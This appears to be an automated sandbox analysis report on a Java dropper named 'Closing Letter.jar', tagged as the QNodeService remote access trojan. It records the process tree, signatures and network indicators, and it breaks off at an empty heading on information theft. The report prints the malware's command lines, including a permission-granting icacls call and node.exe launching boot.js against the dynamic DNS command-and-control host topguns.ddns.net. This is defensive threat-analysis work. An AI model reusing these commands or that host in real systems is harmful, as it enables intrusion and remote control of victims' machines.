
Analysis Report Closing Letter.jar

Overview

General Information

Sample Name: Closing Letter.jar
Analysis ID: 302849
MD5: 831b760ab36e475c75edf3995058c835
SHA1: 6cd5e4ea8b9c1649d4e0e4f2a69ef77456f5048a
SHA256: 397a2d60c33dfdcd5cc56ae22b22989f31c154ced6547d9f1487ae02a1dc30db
Tags: jar, QNodeService, RAT

Detection

QNodeService
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected QNodeService
Exploit detected, runtime environment starts unknown processes
Uses dynamic DNS services
Yara detected Allatori_JAR_Obfuscator
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches a Java Jar file from a suspicious file location
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • cmd.exe (PID: 6148 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 4240 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar' MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 6992 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • javaw.exe (PID: 6900 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
        • node.exe (PID: 4968 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)
          • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • node.exe (PID: 6028 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)
            • node.exe (PID: 5328 cmdline: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net MD5: F0B11A5823C45FC2664E116DC0323BCB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Closing Letter.jar | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\28fda05a.tmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |
00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |
00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |
00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |
00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp | JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

Networking:

Uses dynamic DNS services
Source: unknown | DNS query: name: topguns.ddns.net
Source: Joe Sandbox View | IP Address: 193.228.91.12
Source: Joe Sandbox View | IP Address: 104.20.23.46
Source: Joe Sandbox View | ASN Name: REBECCAHOSTUS
Source: Joe Sandbox View | JA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
Source: unknown | DNS traffic detected: queries for: nodejs.org
Source: java.exe, 00000002.00000002.709063871.000000000A9C0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918652198.000000000A1BD000.00000004.00000001.sdmp | String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: java.exe, 00000002.00000002.709099121.000000000A9D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp | String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000007.00000002.936544095.000000001696B000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.926957064.00000000150E6000.00000004.00000001.sdmp | String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0#
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: javaw.exe, 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp | String found in binary or memory: http://www.allatori.com
Source: java.exe, 00000002.00000002.720781521.00000000164D0000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.931142684.0000000015C88000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: node.exe, 00000013.00000002.951812248.00007FF64CE07000.00000002.00020000.sdmp | String found in binary or memory: http://www.unicode.org/copyright.html
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=6593
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156
Source: java.exe, 00000002.00000002.709137697.000000000AA07000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.918691155.000000000A1C9000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://nodejs.org/dist/v14.12.0/
Source: javaw.exe, 00000007.00000002.936026786.0000000016840000.00000004.00000001.sdmp | String found in binary or memory: https://nodejs.org/dist/v14.12.0/3FCA97F
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000007.00000002.919118746.000000000A345000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: node.exe, 00000010.00000003.822183414.000001AB67737000.00000004.00000001.sdmp | String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process Stats: CPU usage > 98%
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_032DEC17 2_2_032DEC17
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC06584 7_3_0AC06584
Source: classification engine | Classification label: mal60.troj.expl.evad.winJAR@15/1028@4/3
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Section loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'' >> C:\cmdlinestart.log 2>&1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
Source: unknown | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Data Obfuscation:

Yara detected Allatori_JAR_Obfuscator
Source: Yara match | File source: Closing Letter.jar, type: SAMPLE
Source: Yara match | File source: 00000007.00000003.674948698.00000000025E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.912897413.0000000002958000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.707554230.00000000031B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.707993632.000000000548C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.653167812.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: java.exe PID: 4240, type: MEMORY
Source: Yara match | File source: Process Memory Space: javaw.exe PID: 6900, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\28fda05a.tmp, type: DROPPED
Source: Java tracing | Executes: java.lang.ProcessBuilder(java.util.List) on c:\program files (x86)\java\jre1.8.0_211\bin\javaw.exe -javaagent:"c:\users\user\appdata\local\temp\jartracer.jar" -jar c:\users\user\appdata\local\temp\28fda05a.tmp
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323D877 push 00000000h; mov dword ptr [esp], esp 2_2_0323D8A1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323BB27 push 00000000h; mov dword ptr [esp], esp 2_2_0323BB4D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323B377 push 00000000h; mov dword ptr [esp], esp 2_2_0323B39D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323B907 push 00000000h; mov dword ptr [esp], esp 2_2_0323B92D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323A1CA push ecx; ret 2_2_0323A1DA
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323A1DB push ecx; ret 2_2_0323A1E5
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323D860 push 00000000h; mov dword ptr [esp], esp 2_2_0323D8A1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_03242D44 push eax; retf 2_2_03242D45
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_0323C437 push 00000000h; mov dword ptr [esp], esp 2_2_0323C45D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_032D9751 push cs; retf 2_2_032D9771
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC03B42 push eax; iretd 7_3_0AC03B69
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02957 push eax; iretd 7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC00427 push eax; iretd 7_3_0AC00441
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Code function: 7_3_0AC02A30 push eax; iretd 7_3_0AC02A29
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | File created: C:\Users\user\node-v14.12.0-win-x64.tmp326058425756\node-v14.12.0-win-x64\node.exe
Source: unknown | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | File opened: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.707500483.0000000003130000.00000004.00000001.sdmp, javaw.exe, 00000007.00000002.912762157.00000000028D0000.00000004.00000001.sdmp | Binary or memory string: |[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: java.exe, 00000002.00000002.716189799.0000000015B80000.00000002.00000001.sdmp, javaw.exe, 00000007.00000002.927669866.0000000015380000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_03230632 LdrInitializeThunk, 2_2_03230632
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Memory protected: page read and write | page guard
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Closing Letter.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar C:\Users\user\AppData\Local\Temp\28fda05a.tmp
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Process created: C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\node-v14.12.0-win-x64\node.exe C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js --hub-domain topguns.ddns.net
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: javaw.exe, 00000007.00000002.912212121.00000000010D0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_03230380 cpuid 2_2_03230380
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE\boot.js VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\node-v14.12.0-win-x64\node.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_qhub_node_boBuTE VolumeInformation
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information: